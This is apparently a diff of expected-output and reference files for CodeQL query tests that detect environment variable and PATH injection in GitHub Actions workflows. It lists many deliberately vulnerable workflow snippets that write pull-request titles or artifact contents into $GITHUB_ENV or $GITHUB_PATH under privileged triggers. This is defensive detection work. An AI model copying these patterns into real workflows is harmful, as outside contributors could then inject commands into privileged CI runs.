.github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths -#select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref index 80f72124fe45..01345ebb915b 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvPathInjectionCritical.ql +query: Security/CWE-077/EnvPathInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index 5be9f729ad64..d18365265b8f 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | @@ -16,4 +17,3 @@ nodes | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref index 165a3d20896b..e61216acaa43 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvPathInjectionMedium.ql +query: Security/CWE-077/EnvPathInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 9914ae91df12..85035023f666 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,3 +1,40 @@ +#select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho 